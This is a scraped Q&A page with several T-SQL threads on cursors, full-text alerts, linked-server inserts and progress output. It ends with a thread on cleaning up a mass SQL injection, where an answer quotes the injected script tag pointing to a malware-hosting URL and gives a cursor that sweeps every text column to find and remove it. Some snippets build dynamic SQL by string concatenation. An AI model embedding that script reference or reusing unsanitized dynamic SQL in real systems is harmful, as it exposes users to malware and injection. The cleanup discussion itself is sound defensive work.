sql server 2005 stored procedure unexpected behaviour - sql-server-2005

i have written a simple stored procedure (run as job) that checks user subscribe keyword alerts. when article
posted the stored procedure sends email to those users if the subscribed keyword matched with article title.
One section of my stored procedure is:
OPEN #getInputBuffer
FETCH NEXT
FROM #getInputBuffer INTO #String
WHILE ##FETCH_STATUS = 0
BEGIN
--PRINT #String
INSERT INTO #Temp(ArticleID,UserID)
SELECT A.ID,#UserID
FROM CONTAINSTABLE(Question,(Text),#String) QQ
JOIN Article A WITH (NOLOCK) ON A.ID = QQ.[Key]
WHERE A.ID > #ArticleID
FETCH NEXT
FROM #getInputBuffer INTO #String
END
CLOSE #getInputBuffer
DEALLOCATE #getInputBuffer
This job run every 5 minute and it checks last 50 articles.
It was working fine for last 3 months but a week before it behaved unexpectedly.
The problem is that it sends irrelevant results.
The #String contains user alert keyword and it matches to the latest articles using Full text search. The normal execution time is 3 minutes but its execution time
is 3 days (in problem).
Now the current status is its working fine but we are unable to find any reason why it sent irrelevant results.
Note: I have already removing noise words from user alert keyword.
I am using SQL Server 2005 Enterprise Edition.

I don't have the answer, but have you asked all the questions?
Does the long execution time always happen for all queries? (Yes--> corruption? disk problems?)
Or is it only for one #String? (Yes--> anything unusual about the term? Is there a "hidden" character in the string that doesn't show up in your editor?)
Does it work fine for that #String against other sets of records, maybe from a week ago? (Yes--> any unusual strings in the data rows?)
Can you reproduce it at will? (From your question, it seems that the problem is gone and you can't reproduce it.) Was it only for one person, at one time?
Hope this helps a bit!

Does the CONTAINSTABLE(Question,(Text),#String) work in an ad hoc query window? If not it may be that your Full Text search indexes are corrupt and need rebuilding
Rebuild a Full-Text Catalog
Full-Text Search How-to Topics
Also check any normal indexes on Article table, they might just need rebuilding for statistical purposes or could be corrupt too
UPDATE STATISTICS (Transact-SQL)

I'd go along with Glen Little's line of thinking here.
If a user has registered a subscribed keyword which coincidentally (or deliberately) contains some of the CONTAINSTABLE search predicates e.g. NEAR, then the query may take longer than usual. Not perhaps "minutes become days" longer, but longer.
Check for subscribed keywords containing *, ", NEAR, & and so on.
The CONTAINSTABLE function allows for a very complex set of criteria. Consider the FREETEXTTABLE function which has a lighter matching algorithm.

1) How do you know it sends irrelevant results?
If it is because user reported problem: Are you sure she didnt change her keywords between mail and report?
Can you add some automatic check at end of procedure to check if it gathered bad results? Perhaps then you can trap the cases when problems occur
2) "This job run every 5 minute and it checks last 50 articles."
Are you sure it's not related to timing? If job takes more than 5 minutes one time, what happens? A second job is starting...
You do not show your cursor declaraion, is it local or could there be some kind of interference if several processes run simultaneously? Perhaps try to add some kind of locking mechanism.

Since the cursors are nested you will want to try the following. It's my understanding that testing for zero can get you into trouble when the cursors are nested. We recently changed all of our cursors to something like this.
WHILE (##FETCH_STATUS <> -1) BEGIN
IF (##FETCH_STATUS <> -2) BEGIN
INSERT INTO #Temp(ArticleID,UserID)
SELECT A.ID,#UserID
FROM CONTAINSTABLE(Question,(Text),#String) QQ
JOIN Article A WITH (NOLOCK) ON A.ID = QQ.[Key]
WHERE A.ID > #ArticleID
END
FETCH NEXT FROM #getInputBuffer INTO #String
END

Related

SQL Server 2014 slow remote insert

I have several linked servers and I want insert a value into each of those linked servers. On first try executing, I've waited too long for the INSERT using CURSOR. It's done for about 17 hours. But I'm curious for those INSERT queries, and I checked a single line of my INSERT query using Display Estimated Execution Plan, it showed a Cost of 46% on Remote Insert and Constant Scan for 54%.
Below of my code snippets I worked before
DECLARE #Linked_Servers varchar(100)
DECLARE CSR_STAGGING CURSOR FOR
SELECT [Linked_Servers]
FROM MyTable_Contain_Lists_of_Linked_Server
OPEN CSR_STAGGING
FETCH NEXT FROM CSR_STAGGING INTO #Linked_Servers
WHILE ##FETCH_STATUS = 0
BEGIN
BEGIN TRY
EXEC('
INSERT INTO ['+#Linked_Servers+'].[DB].[Schema].[Table] VALUES (''bla'',''bla'',''bla'')
')
END TRY
BEGIN CATCH
DECLARE #ERRORMSG as varchar(8000)
SET #ERRORMSG = ERROR_MESSAGE()
END CATCH
FETCH NEXT FROM CSR_STAGGING INTO #Linked_Servers
END
CLOSE CSR_STAGGING
DEALLOCATE CSR_STAGGING
Also below, figure of how I check my estimation execution plan of my query
I check only INSERT query, not all queries.
How can I get best practice and best performance using Remote Insert?
You can try this, but I think the difference should be negligibly better. I do recall that when reading on the differences of approaches with doing inserts across linked servers, most of the standard approaches where basically on par with each other, though its been a while since I looked that up, so do not quote me.
It will also require you to do some light rewriting due to the obvious differences in approach (and assuming that you would be able to do so anyway). The dynamic sql required to do this might be tricky though as I am not entirely sure if you can call openquery within dynamic sql (I should know this but ive never needed to either).
However, if you can use this approach, the main benefit is that the where clause gets the destination schema without having to select any data (because 1 will never equal 0).
INSERT OPENQUERY (
[your-server-name],
'SELECT
somecolumn
, another column
FROM destinationTable
WHERE 1=0'
-- this will help reduce the scan as it will
-- get schema details without having to select data
)
SELECT
somecolumn
, another column
FROM sourceTable
Another approach you could take is to build a insert proc on the destination server/DB. Then you just call the proc by sending the params over. While yes this is a little bit more work, and introduces more objects to maintain, it add simplicity into your process and potentially reduces I/O when sending things across the linked servers, not to mention might save on CPU cost of your constant scans as well. I think its probably a more clean cut approach instead of trying to optimize linked server behavior.

while loop with cursor and dynamic SQL doesn't terminate

I like to write a procedure that return the name of each table, that has a row with specific id. I other words, the tables have a column 'id' which is of type varchar and contains an uuid. After doing some research, I chose the following approach (simplified, focussing on the problem that I can't solve/understand):
-- get a cursor for all foo table names that have an id column
DECLARE table_name_cursor CURSOR FOR
SELECT a.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id
AND a.name like 'Foo%'
AND b.name = 'id'
GO
-- define some variables
DECLARE #current_table_name VARCHAR(100)
DECLARE #id_found VARCHAR(100)
OPEN table_name_cursor
FETCH table_name_cursor INTO #current_table_name
WHILE ##SQLSTATUS = 0
BEGIN
EXEC ('SELECT #id_found = id from ' + #current_table_name + " where id = '#id_param'") -- #id_param will be passed with the procedure call
select #current_table_name
FETCH table_name_cursor INTO #current_table_name
END
-- clean up resources
CLOSE table_name_cursor
DEALLOCATE table_name_cursor
It works as expected, when the size of the cursor is fairly low (~20 tables in my case) but if the cursor size grows, then the procedure never terminates.
It smells like a resource problem but my white belt in Sybase-Fu doesn't help finding the answer.
Question: why does it stops working with 'too many' cursor rows and is there a way to get it working with this approach?
Is there an alternative (better) way to solve to real problem (running queries on all tables)? This is not intended to be used for production, it's just some sort of dev/maintenance script.
It might help to have some context around your comment "it stops working", eg, does the proc return unexpectedly, does the proc generate a stack trace, is it really 'stopped' or is it 'running longer than expected'?
Some basic monitoring should help figure out what's going on:
does sp_who show the cursor process as being blocked (eg, by other processes that have an exclusive lock on data you're querying)
do periodic queries of master..monProcessWaits where SPID =<spid_of_cursor_process> show any events with largish amounts of wait time (eg, high wait times for disk reads; high wait times for network writes)
do periodic queries of master..{monProcessStatement|monProcessObject} where SPID = <spid_of_cursor_process> show cpu/wait/logicalreads/physicalreads increasing?
I'm guessing some of your SELECTs are running against largish tables with no usable index on the id column, with the net result being that some SELECTs are running expensive (and slow) table and/or index scans, possibly having to wait while large volumes of data are pulled from disk.
If my guess is correct, the MDA tables should show ever increasing numbers for disk waits, logical/physical reads, and to a lesser extent cpu.
Also, if you are seeing large volumes of logical/physical reads (indicative of table/index scans), the query plan for the currently running SELECT should confirm the use of a table/index scan (and thus the inability to find/use an index on the id column for the current table).
For your smaller/faster test runs I'm guessing you're hitting either a) smaller tables where table/index scans are relatively fast and/or b) tables with usable indexes on the id column (and thus relatively fast index lookups).
Something else to consider ... what application are you using to make your proc call?
I've lost track of the number of times where a user has run into some ... shall I say 'funky' issues ... when accessing ASE; with the issue normally being tracked back to a configuration or coding issue with the front-end/client application.
In these circumstances I suggest the user run their query(s) and/or procs via the isql command line tool to see if they get the same 'funky' results; more often than not the isql command line session does not show the 'funky' behavior, thus pointing to an issue with whatever application/tool the user is has been using to access ASE.
NOTE: By isql command line tool I mean exactly that ... the command line tool ... not to be confused with wisql or dbisql or any other point-n-click GUI tool (many of which do cause some 'funky' behavior under certain scenarios).
NOTE: Even if this turns out to be a client-side issue (as opposed to an ASE issue), the MDA tables can often pinpoint this, eg, monProcessWaits might show a large amount of wait time while waiting for output (to the client) to complete; in this scenario sp_who would also show the spid with a status of send sleep (ie, ASE is waiting for client to process the last result set sent by ASE to the client).

Sql queries not 'reporting' back until all queries have finish executing

I'm running a set of sql queries and they are not reporting the row affect until all the queries have ran. Is there anyway i can get incremental feedback.
Example:
DECLARE #HowManyLastTime int
SET #HowManyLastTime = 1
WHILE #HowManyLastTime <> 2400000
BEGIN
SET #HowManyLastTime = #HowManyLastTime +1
print(#HowManyLastTime)
END
This doesn't show the count till the loop has finished. How do i make it show the count as it runs?
To flush recordcounts and other data to the client, you'll want to use RaisError with NOWAIT. Related questions and links:
PRINT statement in T-SQL
http://weblogs.sqlteam.com/mladenp/archive/2007/10/01/SQL-Server-Notify-client-of-progress-in-a-long-running.aspx
In SSMS this will work as expected. With other clients, you might not get a response from the client until the query execution is complete.
SQL tends to be 'set-based', and you are thinking procedurally and trying to make it act systematically. It really doesn't make sense to do this in SQL.
I would be asking you motivation for doing this, and is there anything better that can be tried.

Running Stored Procedure with parameters resulting from query

It's not hard to find developers who think cursors are gauche but I am wondering how to solve the following problem without one:
Let's say I have a proc called uspStudentDelete that takes as a parameter #StudentID.
uspStudentDelete applies a bunch of cascading soft delete logic, marking a flag on tables like "classes", "grades", and so on as inactive. uspStudentDelete is well vetted and has worked for some time.
What would be the best way to run uspStudentDelete on the results of a query (e.g. select studentid from students where ... ) in TSQL?
That's exactly what cursors are intended for:
declare c cursor local for <your query here>
declare #ID int
open c
fetch next from c into #id
while ##fetch_status = 0
begin
exec uspStudentDelete #id
fetch next from c into #id
end
close c
deallocate c
Most people who rail against cursors think you should do this in a proper client, like a C# desktop application.
The best solution is to write a set-based proc to handle the delete (try running this through a cursor to delete 10,000 records and you'll see why) or to add the set-based code to the current proc with a parameter to tell you wheter to run the set-based or single record part of the proc (this at least keeps it together for maintenance purposes).
In SQL Server 2008 you can use a table variable as an input variable. If you rewrite the proc to be set-based, you can have the same logic and run it no matter if the proc sends in one record or ten thousand. You may need to have a batch process in there to avoid deleting millions of records in one go though and locking up the tables for hours. Of course if you do this you will also need to adjust how the currect sp is being called.

What's the best way of cleaning up after a SQL Injection?

I've been tasked with the the maintenance of a nonprofit website that recently fell victim to a SQL injection attack. Someone exploited a form on the site to add text to every available text-like field in the database (varchar, nvarchar, etc.) which, when rendered as HTML, includes and executes a JavaScript file.
A Google search of the URL indicates that it's from email spammers based out of Romania or China, but that's not what's important right now.
I went through and manually removed the information from the the text fields that render on most visible and popular pages on the site but I'm curious as to what would be the best programmatic way of removing the text from the other text fields on the site.
Obviously there's more that needs to be done (hardening the site against SQL injections, using something like markdown instead of storing HTML, etc.) and I am working on those but for the time being what I really need is a good way to go in and programmatically remove the injected text. I know what the exact text is, it's the same every time, and it's always appended to the end of any text field. I can't afford to strip out all HTML in the database at this time and I don't know when this happened exactly so I can't just roll back to a backup. Also, the site is on shared hosting and I cannot connect to the database directly with SQL Server tools. I can execute queries against it though, so if there's any way of constructing a SQL update statement to the effect of "hey find all the text fields in all of the tables in the entire database and do this to clean them" that would be the best.
Restore the data from a recent backup.
I was victim and you can use it to clean up
UPDATE Table
SET TextField = SUBSTRING(TextField, 1, CHARINDEX('</title', TextField) - 1)
WHERE (ID IN (SELECT ID FROM Table WHERE (CHARINDEX('</title', Textfield, 1) > 0)))
Assuming you've fallen victim to the same attack as everyone else, then SQLMenace' code is close. However, that attack uses a number of different script urls, so you'll have to customize it to make sure it matches the url you're seeing in your database.
I wrote about it as well, and my solution code included a more-generic cleanup.
One important point is that the very first thing you need to do is take down the site. Right now you're actively serving malware to your users, and that could put you in a legal fix later. Put up a placeholder page so your users aren't left in the dark, but don't keep serving up malware. Then you can fix the site to make sure it's no longer vulnerable to injection. The simplest way to do that for this particular attack is to just disable sysobjects/syscolumns permissions for your web user, but you'll want to make a more through cleanup as well or it's only a matter of time until you're cracked again. Then you can use the code provided to clean up the site and put it back live.
This will reverse that, also it would be wise to take sysobject permissions away from the username your site runs with, and to sanitize input of course
DECLARE #T VARCHAR(255),#C VARCHAR(4000)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id and a.xtype='u' and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO #T,#C
WHILE(##FETCH_STATUS=0)
BEGIN
EXEC('if exists (select 1 from ['+#T+'] where ['+#C+'] like ''%"></title><script src="http://1.verynx.cn/w.js"></script><!--'') begin print ''update ['+#T+'] set ['+#C+']=replace(['+#C+'],''''"></title><script src="http://1.verynx.cn/w.js"></script><!--'''','''''''') where ['+#C+'] like ''''%"></title><script src="http://1.verynx.cn/w.js"></script><!--'''''' end')
FETCH NEXT FROM Table_Cursor INTO #T,#C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
I wrote about this a while back here: Microsoft Has Released Tools To Address SQL Injection Attacks